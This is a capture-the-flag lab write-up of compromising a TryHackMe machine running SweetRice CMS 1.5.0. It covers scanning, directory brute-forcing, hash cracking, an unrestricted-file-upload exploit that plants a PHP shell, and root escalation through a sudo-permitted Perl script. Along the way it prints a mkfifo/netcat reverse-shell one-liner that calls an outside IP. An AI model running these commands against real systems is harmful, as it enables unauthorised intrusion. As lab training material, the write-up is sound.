ย
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
โโโ(rootใฟkali)-[/home/local_host/Desktop/THM]
โโ# nmap -sV 10.10.39.105
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-12 11:35 IST
Nmap scan report for 10.10.39.105
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds
Letโs check out port number 80
We can see that itโs a apache2 Ubuntu Default page letโs discover the directories by gobuster
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
โโโ(rootใฟkali)-[/home/local_host/Desktop/THM]
โโ# gobuster dir -u 10.10.39.105 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html -q
/.hta (Status: 403) [Size: 277]
/.hta.php (Status: 403) [Size: 277]
/.hta.txt (Status: 403) [Size: 277]
/.hta.html (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd.php (Status: 403) [Size: 277]
/.htaccess.php (Status: 403) [Size: 277]
/.htpasswd.txt (Status: 403) [Size: 277]
/.htaccess.txt (Status: 403) [Size: 277]
/.htpasswd.html (Status: 403) [Size: 277]
/.htaccess.html (Status: 403) [Size: 277]
/content (Status: 301) [Size: 314] [--> http://10.10.39.105/content/]
/index.html (Status: 200) [Size: 11321]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 277]
๐ค๐ค /content
Thereโs a Sweet Rice notice
Letโs Check the sub directories of /content aswell!!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
โโโ(rootใฟkali)-[/home/local_host/Desktop/THM]
โโ# gobuster dir -u 10.10.39.105/content -w /usr/share/wordlists/dirb/common.txt -x php,txt,html -q
/.hta (Status: 403) [Size: 277]
/.hta.php (Status: 403) [Size: 277]
/.hta.txt (Status: 403) [Size: 277]
/.hta.html (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess.txt (Status: 403) [Size: 277]
/.htpasswd.php (Status: 403) [Size: 277]
/.htaccess.html (Status: 403) [Size: 277]
/.htpasswd.txt (Status: 403) [Size: 277]
/.htaccess.php (Status: 403) [Size: 277]
/.htpasswd.html (Status: 403) [Size: 277]
/_themes (Status: 301) [Size: 322] [--> http://10.10.39.105/content/_themes/]
/as (Status: 301) [Size: 317] [--> http://10.10.39.105/content/as/]
/attachment (Status: 301) [Size: 325] [--> http://10.10.39.105/content/attachment/]
/changelog.txt (Status: 200) [Size: 18013]
/images (Status: 301) [Size: 321] [--> http://10.10.39.105/content/images/]
/inc (Status: 301) [Size: 318] [--> http://10.10.39.105/content/inc/]
/index.php (Status: 200) [Size: 2198]
/index.php (Status: 200) [Size: 2198]
/js (Status: 301) [Size: 317] [--> http://10.10.39.105/content/js/]
/license.txt (Status: 200) [Size: 15410]
changelog.txt๐
1
2
3
4
5
6
7
8
9
#############################################
SweetRice - Simple Website Management System
Version 1.5.0
Author:Hiler Liu steelcal@gmail.com
Home page:http://www.basic-cms.org/
#############################################
New web - new SweetRice for both PC & mobile website creator,easy way to follow the new web world.
========================================
We can now conclude that the target machine is using SweetRice CMS V1.5.0. Letโs search Exploit-DB
ย download and open the mysql_bakup_20191129023059-1.5.1.sql file
We now have a username and a password hash. Letโs crack the hash using hashcat.
We can now login to admin panel as we have both the username and password
We have found that thereโs Arbitrary File Upload vulnurablity. We can exploit it to upload a reverse shell script and gain access to the target machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ __ __________.__ |
| / _____/_ _ __ ____ _____/ |\______ \__| ____ ____ |
| \_____ \ \/ \/ // __ \_/ __ \ __\ _/ |/ ___\/ __ \ |
| / \ /\ ___/\ ___/| | | | \ \ \__\ ___/ |
|/_______ / \/\_/ \___ >\___ >__| |____|_ /__|\___ >___ > |
| \/ \/ \/ \/ \/ \/ |
| > SweetRice 1.5.1 Unrestricted File Upload |
| > Script Cod3r : Ehsan Hosseini |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
[+] Sending User&Pass...
[+] Login Succssfully...
[+] File Uploaded...
[+] URL : http://10.10.39.105/content/attachment/shell.php5
1
2
3
4
5
6
7
8
9
โฏ nc -nlvp 1234
Connection from 10.10.39.105:44046
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
09:34:23 up 33 min, 0 users, load average: 0.00, 0.01, 0.24
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
Letโs navigate the file system to find the user.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ cd /home
$ ls
itguy
$ cd itguy
$ ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backup.pl
examples.desktop
mysql_login.txt
user.txt
$ cat user.txt
THM{63e5bce927******************}
Privilege Escalation
1
2
3
4
5
6
7
8
9
10
$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
$ cat backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
The backup.pl script executes /etc/copy.sh. !!!!!!
1
2
$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
We can run this file as root, so if we create a reverse shell using this file, we can get root access to the target machine from our host macine
1
$ echo 'php /var/www/html/content/attachment/shell.php5' > /etc/copy.sh
Now we have to run backup.pl as root.
1
2
$ sudo /usr/bin/perl /home/itguy/backup.pl
$ Successfully opened reverse shell to 10.17.15.106:1234
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ nc -nlvp 1234
Connection from 10.10.39.105:44052
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
09:46:00 up 44 min, 0 users, load average: 0,00, 0,00, 0,09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{6637f41d01***************}